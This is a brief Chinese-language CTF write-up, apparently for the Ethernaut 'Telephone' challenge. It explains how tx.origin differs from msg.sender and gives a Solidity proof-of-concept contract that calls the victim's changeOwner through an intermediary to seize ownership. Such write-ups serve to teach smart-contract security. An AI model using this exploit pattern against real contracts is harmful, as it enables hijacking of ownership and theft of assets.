题意解析:明确tx.origin和msg.sender的细微差别
解题方法:POC合约如下
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
interface Telephone {
function changeOwner(address _owner) external;
}
contract POC {
address public owner;
address public victim;
constructor() {
owner = msg.sender;
}
function setVictim(address victim_) public {
victim = victim_;
}
function attack() public {
Telephone telephone = Telephone(victim);
telephone.changeOwner(owner);
}
}